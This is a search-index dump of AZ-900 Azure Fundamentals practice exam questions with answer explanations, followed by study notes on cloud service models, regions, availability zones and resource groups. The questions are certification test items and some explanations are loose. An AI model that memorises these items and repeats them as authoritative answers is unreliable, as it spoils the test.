        Azure Data Lake Storage Gen2 is a set of capabilities dedicated to big data analytics, built on\u00a0Azure Blob Storage. Data Lake Storage Gen2 converges the capabilities of\u00a0Azure Data Lake Storage Gen1\u00a0with Azure Blob Storage. For example, Data Lake Storage Gen2 provides file system semantics, file-level security, and scale. Because these capabilities are built on Blob storage, you'll also get low-cost, tiered storage, with high availability/disaster recovery capabilities. Reference: https://docs.microsoft.com/en-us/azure/storage/blobs/data-lake-storage-introduction

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-56-someone-in-your-organization-accidentally-deleted-an-important-virtual-machine-that-has-led-to-huge-revenue-losses-your-senior-management-has-tasked-you-with-investigating-who-was-responsible-for-the-deletion-which-azure-service-can-you-leverage-for-this-task","title":"Question 56:\u00a0Someone in your organization accidentally deleted an important Virtual Machine that has led to huge revenue losses. Your senior management has tasked you with investigating who was responsible for the deletion. Which Azure service can you leverage for this task?","text":"
        • Azure Service Health
        • Azure Arc
        • Azure Monitor
        • Azure Advisor
        • Azure Event Hubs

        Log Analytics\u00a0is a tool in the Azure portal that's used to edit and run log queries with data in\u00a0**Azure Monitor **\u00a0Logs. You might write a simple query that returns a set of records and then use features of Log Analytics to sort, filter, and analyze them. Or you might write a more advanced query to perform statistical analysis and visualize the results in a chart to identify a particular trend. Whether you work with the results of your queries interactively or use them with other Azure Monitor features, such as log query alerts or workbooks, Log Analytics is the tool that you'll use to write and test them.

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-57-true-or-false-azure-dns-can-manage-dns-records-for-your-azure-services-but-cannot-provide-dns-for-your-external-resources","title":"Question 57:\u00a0True or False: Azure DNS can manage DNS records for your Azure services, but cannot provide DNS for your external resources.","text":"
        • False
        • True

        Azure DNS can manage DNS records for your Azure services\u00a0and provide DNS for your external resources as well.\u00a0Azure DNS is integrated in the Azure portal and uses the same credentials, support contract, and billing as your other Azure services. DNS billing is based on the number of DNS zones hosted in Azure and on the number of DNS queries received. To learn more about pricing, see\u00a0Azure DNS pricing.

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-58-_______-is-a-strategy-that-employs-a-series-of-mechanisms-to-slow-the-advance-of-an-attack-thats-aimed-at-acquiring-unauthorized-access-to-information-each-layer-provides-protection-so-that-if-one-layer-is-breached-a-subsequent-layer-is-already-in-place-to-prevent-further-exposure","title":"Question 58:\u00a0_______\u00a0is a strategy that employs a series of mechanisms to slow the advance of an attack that's aimed at acquiring unauthorized access to information. Each layer provides protection so that if one layer is breached, a subsequent layer is already in place to prevent further exposure.","text":"
        • Defense in Depth
        • Defense in Steps
        • Defense in Layers
        • Defense in Series
        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-59-which-of-the-following-is-not-a-feature-of-azure-monitor","title":"Question 59:\u00a0Which of the following is NOT a feature of Azure Monitor?","text":"
        • Log Analytics
        • Database management
        • Metrics
        • Alerts
        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-60-true-or-false-when-you-cancel-an-azure-subscription-a-resource-lock-can-block-the-subscription-cancellation","title":"Question 60:\u00a0True or False: When you cancel an Azure subscription, a Resource Lock can block the subscription cancellation.","text":"
        • True
        • False

        When you cancel an Azure subscription:

        • A resource lock doesn't block the subscription cancellation.
        • Azure preserves your resources by deactivating them instead of immediately deleting them.
        • Azure only deletes your resources permanently after a waiting period.
        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-61-yes-or-no-each-virtual-network-can-have-only-one-vpn-gateway","title":"Question 61:\u00a0Yes or No: Each virtual network can have only one VPN gateway.","text":"
        • No
        • Yes

        VPN Gateway\u00a0sends encrypted traffic between an Azure virtual network and an on-premises location over the public Internet. You can also use VPN Gateway to send encrypted traffic between Azure virtual networks over the Microsoft network. A VPN gateway is a specific type of virtual network gateway. Each virtual network can have only one VPN gateway. However, you can create multiple connections to the same VPN gateway. When you create multiple connections to the same VPN gateway, all VPN tunnels share the available gateway bandwidth.

        When you configure a virtual network gateway, you configure a setting that specifies the gateway type. The gateway type determines how the virtual network gateway will be used and the actions that the gateway takes. The gateway type 'Vpn' specifies that the type of virtual network gateway created is a 'VPN gateway'. This distinguishes it from an ExpressRoute gateway, which uses a different gateway type. A virtual network can have two virtual network gateways; one VPN gateway and one ExpressRoute gateway. For more information, see\u00a0Gateway types.

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-62-which-of-the-following-is-a-benefit-of-using-azure-cloud-shell-for-managing-azure-resources","title":"Question 62:\u00a0 Which of the following is a benefit of using Azure Cloud Shell for managing Azure resources?","text":"
        • It eliminates the need to install and configure command-line interfaces on your local machine
        • It provides faster access to Azure resources
        • It offers more advanced features than other Azure management tools
        • It allows for easier integration with third-party tools and services
        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-63-__-is-a-domain-specific-language-dsl-that-uses-declarative-syntax-to-deploy-azure-resources","title":"Question 63:\u00a0__ is a domain-specific language (DSL) that uses declarative syntax to deploy Azure resources","text":"
        • Tricep
        • Bicep
        • PHP
        • HTML
        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-64-___-enforcement-is-at-the-center-of-a-zero-trust-architecture","title":"Question 64:\u00a0___ enforcement is at the center of a Zero Trust architecture.","text":"
        • Network
        • Devices
        • Identities
        • Security policy
        • Data
        • Applications

        Security policy enforcement\u00a0is at the center of a Zero Trust architecture. This includes Multi Factor authentication with conditional access that takes into account user account risk, device status, and other criteria and policies that you set.

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-65-how-can-you-apply-a-resource-lock-to-an-azure-resource","title":"Question 65:\u00a0How can you apply a resource lock to an Azure resource?","text":"
        • By using the Azure API\u00a0for RBAC
        • By configuring a network security group.
        • By using the Azure portal or Azure PowerShell
        • By assigning a custom role to the resource.
        • By creating a new resource group for the resource.
        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-66-in-azure-which-of-the-following-services-can-be-accessed-through-private-endpoints","title":"Question 66:\u00a0In Azure, which of the following services can be accessed through private endpoints?","text":"
        • Azure App Service.
        • Azure Storage accounts.
        • Azure SQL Database.
        • All of the above.
        • Azure Key Vault.

        Private endpoints can be used to access various Azure services, including Azure Storage accounts, Azure Key Vault, Azure App Service, and Azure SQL Database. By using private endpoints, you can connect to these services from within your virtual network, ensuring that the traffic remains within the Azure backbone network and doesn't traverse the public internet.

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-67-which-of-the-following-scenarios-is-a-suitable-use-case-for-applying-a-resource-lock","title":"Question 67:\u00a0Which of the following scenarios is a suitable use case for applying a resource lock?","text":"
        • Preventing read access to a development virtual machine.
        • Automating the deployment of resources using templates.
        • Ensuring a critical storage account is not accidentally deleted.
        • Restricting network access to an Azure SQL database.
        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-68-which-of-the-following-best-describes-the-concept-of-immutable-infrastructure-in-the-context-of-iac","title":"Question 68:\u00a0Which of the following best describes the concept of \"immutable infrastructure\" in the context of IaC?","text":"
        • Infrastructure that is managed through a graphical user interface.
        • Infrastructure that cannot be changed once deployed.
        • Infrastructure that is recreated rather than modified in place.
        • Infrastructure that is stored in a physical data center.

        Immutable infrastructure refers to the practice of recreating infrastructure components whenever changes are needed rather than modifying them in place. This approach aligns with IaC principles, enhancing consistency and reducing configuration drift.

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-69-an-____-in-azure-monitor-monitors-your-telemetry-and-captures-a-signal-to-see-if-the-signal-meets-the-criteria-of-a-preset-condition-if-the-conditions-are-met-an-alert-is-triggered-which-initiates-the-associated-action-group","title":"Question 69:\u00a0A(n) ____ in Azure Monitor monitors your telemetry and captures a signal to see if the signal meets the criteria of a preset condition. If the conditions are met, an alert is triggered, which initiates the associated action group.","text":"
        • alert rule
        • preset rule
        • preset condition
        • alert condition

        An\u00a0alert rule\u00a0monitors your telemetry and captures a signal that indicates that something is happening on a specified target. The alert rule captures the signal and checks to see if the signal meets the criteria of the condition. If the conditions are met, an alert is triggered, which initiates the associated action group and updates the state of the alert.

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-70-as-the-owner-of-a-streaming-platform-deployed-on-azure-you-notice-a-huge-spike-in-traffic-whenever-a-new-web-series-in-released-but-moderate-traffic-otherwise-which-of-the-following-is-a-clear-benefit-of-this-type-of-workload","title":"Question 70:\u00a0As the owner of a streaming platform deployed on Azure, you notice a huge spike in traffic whenever a new web-series in released but moderate traffic otherwise. Which of the following is a clear benefit of this type of workload?","text":"
        • Load balancing
        • Elasticity
        • High availability
        • High latency

        Elasticity in this case is the ability to provide additional compute resource when needed (spikes) and reduce the compute resource when not needed to reduce costs. Load Balancing and High Availability are also great advantages the streaming platform would enjoy, but Elasticity is the option that best describes the workload in the Question. Autoscaling is an example of elasticity.

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-71-which-of-the-following-can-repeatedly-deploy-your-infrastructure-throughout-the-development-lifecycle-and-have-confidence-your-resources-are-deployed-in-a-consistent-manner","title":"Question 71:\u00a0Which of the following can repeatedly deploy your infrastructure throughout the development lifecycle and have confidence your resources are deployed in a consistent manner?","text":"
        • Azure Resource Manager templates
        • The Azure API Management service
        • Azure Templates
        • Management groups

        Azure Resource Manager Templates is correct since templates are idempotent (Same), which means you can deploy the same template many times and get the same resource types in the same state.

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-72-in-the-context-of-infrastructure-as-code-iac-___-are-independent-files-typically-containing-set-of-resources-meant-to-be-deployed-together","title":"Question 72:\u00a0In the context of Infrastructure as Code (IaC), ___\u00a0 are independent files, typically containing set of resources meant to be deployed together.","text":"
        • Methods
        • Modules
        • Units
        • Functions

        Modules\u00a0are independent files, typically containing set of resources meant to be deployed together. Modules allow you to break complex templates into smaller, more manageable sets of code. You can ensure that each module focuses on a specific task and that all modules are reusable for multiple deployments and workloads. Reference: https://learn.microsoft.com/en-us/azure/cloud-adoption-framework/ready/considerations/infrastructure-as-code

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-73-___-service-is-available-to-transfer-on-premises-data-to-blob-storage-when-large-datasets-or-network-constraints-make-uploading-data-over-the-wire-unrealistic","title":"Question 73:\u00a0___ service is available to transfer on-premises data to Blob storage when large datasets or network constraints make uploading data over the wire unrealistic.","text":"
        • Azure Blob Storage
        • Azure FileSync
        • Azure Data Factory
        • Azure Data Box
        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-74-which-type-of-resource-lock-allows-you-to-modify-the-resource-but-not-delete-it","title":"Question 74:\u00a0Which type of resource lock allows you to modify the resource, but not delete it?","text":"
        • CanNotModify lock
        • Restrict lock
        • CanNotDelete lock
        • Read-only lock
        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-75-your-colleague-is-looking-for-an-azure-service-that-can-help-them-understand-how-their-applications-are-performing-and-proactively-identify-issues-that-affect-them-and-the-resources-they-depend-on-whats-your-recommendation","title":"Question 75:\u00a0Your colleague is looking for an Azure service that can help them understand how their applications are performing and proactively identify issues that affect them , AND the resources they depend on. What's your recommendation?","text":"
        • Azure Monitor
        • Azure Service Health
        • Azure Advisor
        • Azure Comprehend
        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-76-which-cloud-deployment-model-is-best-suited-for-organizations-with-extremely-strict-data-security-and-compliance-requirements","title":"Question 76:\u00a0Which cloud deployment model is best suited for organizations with extremely strict data security and compliance requirements?","text":"
        • Community cloud
        • Private cloud
        • Public cloud
        • Hybrid cloud
        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-77-if-your-organization-has-many-azure-subscriptions-which-of-the-following-is-useful-to-efficiently-manage-access-policies-and-compliance-for-those-subscriptions","title":"Question 77:\u00a0If your organization has many Azure subscriptions, which of the following is useful to efficiently manage access, policies, and compliance for those subscriptions?","text":"
        • Azure Subscriptions
        • Azure Policy
        • Azure Management Groups
        • Azure Blueprints
        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-78-__-allows-you-to-implement-your-systems-logic-into-readily-available-blocks-of-code-that-can-run-anytime-you-need-to-respond-to-critical-events","title":"Question 78:\u00a0__ allows you to implement your system's logic into readily available blocks of code that can run anytime you need to respond to critical events.","text":"
        • Azure Cognitive Services
        • Azure Application Insights
        • Azure Functions
        • Azure Kinect DK
        • Azure Quantum

        Azure Functions provides \"compute on-demand\" in\u00a0two\u00a0significant ways. First, Azure Functions allows you to implement your system's logic into readily available blocks of code. These code blocks are called \"functions\". Different functions can run anytime you need to respond to critical events. Second, as requests increase, Azure Functions meets the demand with as many resources and function instances as necessary - but only while needed. As requests fall, any extra resources and application instances drop off automatically.

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-79-you-have-managed-a-web-app-that-you-developed-and-deployed-on-prem-for-a-long-time-but-would-now-like-to-move-it-to-azure-and-relieved-of-all-the-manual-administration-and-maintenance-which-of-the-following-buckets-would-be-most-suitable-for-your-use-case","title":"Question 79:\u00a0You have managed a Web App that you developed and deployed On-Prem for a long time, but would now like to move it to Azure and relieved of all the manual administration and maintenance. Which of the following buckets would be most suitable for your use case?","text":"
        • Platform as a Service (PaaS)
        • Software as a Service (SaaS)
        • Infrastructure as a Service (IaaS)
        • Database as a Service (DaaS)
        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-80-microsofts-approach-to-privacy-is-built-on-six-principles-which-of-the-following-is-not-one-of-those-6-principles","title":"Question 80:\u00a0Microsoft's approach to privacy is built on six principles. Which of the following is NOT\u00a0one of those 6 principles?","text":"
        • Transparency
        • Security
        • Strong legal protections
        • Protection
        • Control
        • No content-based targeting

        Microsoft's approach to privacy is built on six principles:

        1. Control: Microsoft provides customers with the ability to control their personal data and how it is used.
        2. Transparency: Microsoft is transparent about the collection, use, and sharing of personal data.
        3. Security: Microsoft takes strong measures to protect personal data from unauthorized access, disclosure, alteration, and destruction.
        4. Strong legal protections: Microsoft complies with applicable laws and regulations, including data protection and privacy laws.
        5. No content-based targeting:\u00a0Microsoft does not use personal data to target advertising to customers based on the content of their communications or files.
        6. Benefits to the customer:\u00a0Microsoft uses personal data to provide customers with valuable products and services that improve their productivity and overall experience.

        Protection is NOT\u00a0one of the principles.

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-81-in-the-context-of-azure-networking-what-is-the-purpose-of-a-network-security-group-nsg-associated-with-a-private-endpoint","title":"Question 81:\u00a0In the context of Azure networking, what is the purpose of a Network Security Group (NSG) associated with a private endpoint?","text":"
        • To manage IP address assignments for the private endpoint.
        • To encrypt data traffic between the private endpoint and the Azure service.
        • To ensure the availability and uptime of the private endpoint.
        • To enforce access control rules on inbound and outbound traffic to the private endpoint.
        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-82-true-or-false-each-zone-is-made-up-of-one-or-more-datacenters-equipped-with-common-power-cooling-and-networking","title":"Question 82:\u00a0True or False: Each zone is made up of one or more datacenters equipped with common power, cooling, and networking.","text":"
        • False
        • True

        Azure Availability Zones are unique physical locations within an Azure region and offer high availability to protect your applications and data from datacenter failures. Each zone is made up of one or more datacenters equipped with\u00a0independent\u00a0power, cooling, and networking.

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-83-what-is-the-maximum-number-of-cloud-only-user-accounts-that-can-be-created-in-azure-ad","title":"Question 83:\u00a0What is the maximum number of cloud-only user accounts that can be created in Azure AD?","text":"
        • 100,000
        • 500,000
        • 50,000
        • 1,000,000

        The correct answer is\u00a0 1,000,000. Azure AD has the capability to hold up to\u00a01,000,000 cloud-only user accounts. This limit can be extended further by contacting Microsoft support.

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-84-your-organization-uses-microsoft-defender-for-cloud-and-you-receive-an-alert-that-suspicious-activity-has-been-detected-on-one-of-your-cloud-resources-what-should-you-do","title":"Question 84:\u00a0Your organization uses Microsoft Defender for Cloud and you receive an alert that suspicious activity has been detected on one of your cloud resources. What should you do?","text":"
        • Delete the cloud resource to prevent the threat from spreading.
        • Investigate the alert and take appropriate action to remediate the threat if necessary.

        • Wait for a follow-up email from Microsoft Support before taking any action.

        • Ignore the alert, as Microsoft Defender for Cloud will automatically handle any threats.
        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-85-which-of-the-following-resources-can-be-managed-using-azure-arc","title":"Question 85:\u00a0Which of the following resources can be managed using Azure Arc?","text":"
        • Only Kubernetes Clusters and Virtual\u00a0Machines
        • All of these
        • Kubernetes clusters
        • Only Windows and Linux Servers &\u00a0Virtual Machines
        • Virtual machines
        • Windows Server and Linux servers

        The answer is All of the these. Azure Arc enables you to manage resources both on-premises and across multiple clouds using a single control plane. This includes managing Windows Server and Linux servers, Kubernetes clusters, and virtual machines. By extending Azure services to hybrid environments, Azure Arc provides consistent management, security, and compliance across all resources.

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-preparation/","title":"AZ-900: Notes to get through the Azure Fundamentals Certificate","text":"

        The following notes are derived from the Microsoft e-learning platform. They may not be entirely original, as I've included some paragraphs directly from the Microsoft e-learning platform and some other sources. However, what makes this repository particularly valuable is my effort to enrich and curate the content, along with the addition of valuable tips that can assist anyone in passing the exam.

        • Notes taken in: September 2023.
        • Certification accomplish at: 23th September 2023.
        • Practice tests: Practice tests from different sources.

        Sources of this notes:

        • The Microsoft e-learn platform.
        • Book: \"Microsoft Certified - Azure Fundamentals. Study guide\", by Jim Boyce.
        • Udemy course: AZ-900 Bootcamp: Microsoft Azure Fundamentals.
        • Udemy course: AZ-900 Microsoft Azure Fundamentals Practice Tests, Sep 2023
        • Linkedin course: Exam tips: Microsoft Azure Fundamentals (AZ-900)
        Labs and resources
        • All labs.
        • Deploy a file share in Microsoft Azure
        • Deploy a virtual network in Microsoft Azure
        • [Provision a resource group in Azure](https://labitpro.com/provision-a-resource-group-in-azure/
        • Deploy and configure an Azure Virtual Machine
        • Deploy and configure an Azure Storage Account
        • Deploy and configure a network security group
        • [Deploy and configure Azure Bastion](https://labitpro.com/deploy-and-configure-azure-bastion/
        • Add a Custom Domain to Azure AD
        • Create Users and Groups in Azure AD
        • Configure Self-Service Password Reset in Azure AD
        • Create and Configure an Azure Storage Account
        • Manage Azure Storage Account Access Keys
        • Create an Azure File Share
        • Create and Attach a VM Data Disk
        • Resize an Azure Virtual Machine
        • Create a VM Scale Set in Azure
        • Configure vNet Peering
        • Create and Configure an Azure Recovery Services Vault
        • Managing Users and Groups in Azure AD
        • Practice with a mock exam.
        • AZ-900 crossword puzzle
        • Flashcards
        ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#basic-cloud-computing-concepts","title":"Basic Cloud Computing concepts","text":"","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#shared-responsability-model","title":"Shared responsability model","text":"

        Very often, IaaS, PaaS and SaaS are referred as Cloud computing stack because esencially they are built on top one from another.

        ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#cloud-models","title":"Cloud models","text":"","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#public-cloud","title":"Public cloud","text":"

        In a public cloud deployment, services are offered over the public internet. These services are available to customers who wish to purchase them. The cloud resources, like servers and storage, are owned and operated by the cloud service provider.

        ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#private-cloud","title":"Private cloud","text":"

        In a private cloud, compute resources are accessed exclusively by users from a single business or organization. You can host a private cloud physically in your own on-prem datacenter, or it can be hosted by a third-party cloud service provider.

        ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#hybrid-cloud","title":"Hybrid cloud","text":"

        A hybrid cloud is a complex computing environment. It combines a public cloud and a private cloud by allowing data and applications to be shared between them. This type of cloud deployment is often utilized by large organizations.

        ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#consumption-based-model","title":"Consumption-Based Model","text":"

        The consumption-based model refers to the way in which organizations only pay for the resources they use. The consumption-based model offers the following benefits:

        • No upfront costs
        • No need to purchase or manage infrastructure
        • Customer pays for resources only when they are needed
        • Customer can stop paying for resources that are no longer needed
        ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#benefits-of-cloud-computing","title":"Benefits of Cloud Computing","text":"

        Cloud computing offers several key advantages over a physical environment:

        • High availability: Cloud-based apps can provide a continuous user experience with virtually no downtime.
        • Scalability: Apps in the cloud can scale vertically and horizontally. When scaling vertically, compute capacity is added by adding RAM or CPUs to a virtual machine. When scaling horizontally, compute capacity is increased by adding instances of resources, such as adding VMs to a configuration.
        • Elasticity: Allows you to configure apps to autoscale so they always have the resources they need.
        • Agility: Deploy and configure cloud-based resources quickly as requirements change.
        • Geo-distribution: Deploy apps to regional datacenters so that customers always have the best performance in their specific region.
        • Disaster recovery: Cloud-based backup services, data replication, and geo-distribution allow you to deploy apps and know that their data is safe in the event of disaster.
        ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#capital-expenses-vs-operating-expenses","title":"Capital Expenses vs. Operating Expenses","text":"

        Organizations have to think about two different types of expenses:

        • Capital Expenditure (CapEx): The spending of money up-front on physical infrastructure. These expenses are deducted over time.
        • Operational Expenditure (OpEx): The spending of money on services or products now and being billed for them now. These expenses are deducted in the same year they are incurred. Most cloud services are considered OpEx.
        ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#the-cloud-computing-stack","title":"The Cloud Computing stack","text":"

        Before delving deeper, I would like to share this highly informative chart depicting Azure services and their position within the cloud computing stack.

        After this, let's start with the stack!

        ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#infrastructure-as-a-service-iaas","title":"Infrastructure-as-a-Service (IaaS)","text":"

        Migrating to IaaS helps reduce the need for maintenance of on-prem data centers and allows organizations to save money on hardware costs. IaaS solutions allow organizations to scale their IT resources up and down with demand, while also allowing them to quickly provision new applications and increase the reliability of their underlying infrastructure.

        1. One common business scenario and use case for IaaS is Lift-and-Shift Migration:

        - migrate app and workloads to the cloud\n- Increase scale and perfomance\n- Enhance security\n- Reduce the cost without refactoring the application\n

        2. Another common use case is Storage, backup, and recovery:

        - Avoid capital outlay for storage and complexity of storage management\n- IaaS is useful for handling unpredictable demand and steadily growing storage needs\n- Simplify planning/management of backup/recovery\n

        3. Web apps IaaS provides all the infrastructure needed to support web apps: storage, web and application servers, networking resources. Quickly deployable, easily scale infrastructure up and down.

        4. High-performance computer

        ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#platform-as-a-service-paas","title":"Platform-as-a-Service (PaaS)","text":"

        Basically, PaaS is a complete development and deployment environment in the cloud. Includes: servers, storage, networking, middleware, development tools, BI services, database management systems, and more. PaaS supports the complete web application lifecycle. Yo manage the applications and services and the service provider manages everything else.

        Platform-as-a-Service is a complete development and deployment environment in the cloud. It can be used to deploy simple cloud-based apps and complex cloud-enabled enterprise applications. When leveraging PaaS, you purchase the resources you need from your cloud service provider on a pay-as-yougo basis. The resource you purchase are accessed over a secure Internet connection.

        PaaS resources include the same resources included in IaaS (servers, storage, and networking) PLUS things like middleware, development tools, business intelligence services, and database management systems.

        It\u2019s important to remember that PaaS is designed to support the complete web application lifecycle. It allows organizations to avoid the expense buying and managing software licenses, underlying infrastructure and middleware, container orchestrators, and development tools.

        Ultimately, when leveraging PaaS offerings, you manage the applications and services, while the cloud service provider manages everything else.

        1. One common business scenario and use case for PaaS is Development framework. A framework that developers can use to develop or customize cloud based applications and that Azure provides.

        2. Analytics and BI: tools provided as a service with PaaS.

        ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#software-as-a-service-saas","title":"Software-as-a-Service (SaaS)","text":"

        Software-as-a-Service allows users to connect to cloud-based apps over the Internet. Microsoft Office 365 is a good example of SaaS in action. Gmail would be another good example. SaaS provides a complete software solution that\u2019s purchased on a pay-as-you-go basis from a cloud service provider. It\u2019s essentially the rental of an app, that users can then connect to over the Internet, via a web browser. The underlying infrastructure, middleware, app software, and app data for a SaaS solution are all hosted in the provider\u2019s data center, which means the service provider is responsible for managing the hardware and software. SaaS allows organizations to get up and running quickly, with minimal upfront cost.

        ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#architectural-components","title":"Architectural components","text":"

        The core architectural components of Azure may be broken down into two main groupings: the physical infrastructure, and the management infrastructure.

        ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#physical-infrastructure","title":"Physical infrastructure","text":"

        The physical infrastructure for Azure starts with datacenters. Conceptually, the datacenters are the same as large corporate datacenters. They\u2019re facilities with resources arranged in racks, with dedicated power, cooling, and networking infrastructure. \u00a0Individual datacenters aren\u2019t directly accessible. Datacenters are grouped into Azure Regions or Azure Availability Zones

        ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#azure-region","title":"Azure Region","text":"

        A region is a geographical area that contains at least one (but potentially multiple) datacenters that are networked together with a low-latency network.

        Every Azure region is paired with another region within the same geography (ie. US, Europe, or Asia) at least 300 miles away in order to allow replication of resources across that geography. Replicating resources across region pairs helps reduce interruptions due to events like natural disasters, civil unrest, power outages, or physical network outages that affect both regions at once.

        Some services or features are only available in certain regions. Others don't require to select an specific region. For instance: Azure Active Directory, Azure Traffic Manager, or Azure DNS.

        ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#availability-zones","title":"Availability zones","text":"

        Availability zones are physically separate datacenters within an Azure region. Each availability zone is made up of one or more datacenters equipped with independent power, cooling, and networking.

        Availability zones are physically separate datacenters within an Azure region. Every availability zone includes one or more datacenters that features independent power, cooling, and networking. In essence, an availability zone is designed to be an isolation boundary, meaning if one zone goes down, the other continues working.

        Availability zones are designed primarily for VMs, managed disks, load balancers, and SQL databases. It is important to remember that availability zones are connected through private high-speed fiber-optic networks. The image below shows what availability zones look like within a region:

        To ensure resiliency, a minimum of three separate availability zones are present in all availability zone-enabled regions. However, not all Azure Regions currently support availability zones.

        Azure services that support availability zones fall into three categories:

        • Zonal services: You pin the resource to a specific zone (for example, VMs, managed disks, IP addresses).
        • Zone-redundant services: The platform replicates automatically across zones (for example, zone-redundant storage, SQL Database).
        • Non-regional services: Services are always available from Azure geographies and are resilient to zone-wide outages as well as region-wide outages.
        ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#region-pairs","title":"Region pairs","text":"

        Each Azure region is paired with another region within the same geography at least 300 miles away. This is done to allow for the replication of resources across a geography and reduce the chance of unavailability. West US region is, for instance, paired with East US.

        If an outage occurs: one region is prioritized to make sure that at least one is restored as quickly as possible. It also does so to minimize downtime. Data continues to reside within the same geography as its pair (except for Brazil South) for tax -and law- enforcement jurisdiction purposes.

        Most regions are paired in two directions, meaning they are the backup for the region that provides a backup for them (West US and East US back each other up). However, some regions, such as West India and Brazil South, are paired in only one direction. In a one-direction pairing, the Primary region does not provide backup for its secondary region. So, even though West India\u2019s secondary region is South India, South India does not rely on West India. West India's secondary region is South India, but South India's secondary region is Central India. Brazil South is unique because it's paired with a region outside of its geography. Brazil South's secondary region is South Central US. The secondary region of South Central US isn't Brazil South.

        Sovereign regions

        In addition to regular regions, Azure also has sovereign regions. Sovereign regions are instances of Azure that are isolated from the main instance of Azure. You may need to use a sovereign region for compliance or legal purposes. Azure sovereign regions include: - US DoD Central, US Gov Virginia, US Gov Iowa and more: These regions are physical and logical network-isolated instances of Azure for U.S. government agencies and partners. These datacenters are operated by screened U.S. personnel and include additional compliance certifications. - China East, China North, and more: These regions are available through a unique partnership between Microsoft and 21Vianet, whereby Microsoft doesn't directly maintain the datacenters.

        ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#management-infrastructure","title":"Management infrastructure","text":"","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#azure-resources-and-resource-groups","title":"Azure Resources and Resource Groups","text":"

        A resource is the basic building block of Azure. Anything you create, provision, deploy, etc. is a resource. Virtual Machines (VMs), virtual networks, databases, cognitive services, etc. are all considered resources within Azure.

        Resource groups are simply groupings of resources. When you create a resource, you\u2019re required to place it into a resource group. While a resource group can contain many resources, a single resource can only be in one resource group at a time. Some resources may be moved between resource groups, but when you move a resource to a new group, it will no longer be associated with the former group. Additionally, resource groups can't be nested, meaning you can\u2019t put resource group B inside of resource group A.

        If you grant or deny access to a resource group, you\u2019ve granted or denied access to all the resources within the resource group. When deleting a resource group, all resources included in it will be deleted, so it makes sense to organized your resource groups by similar lifecycle, or by function.

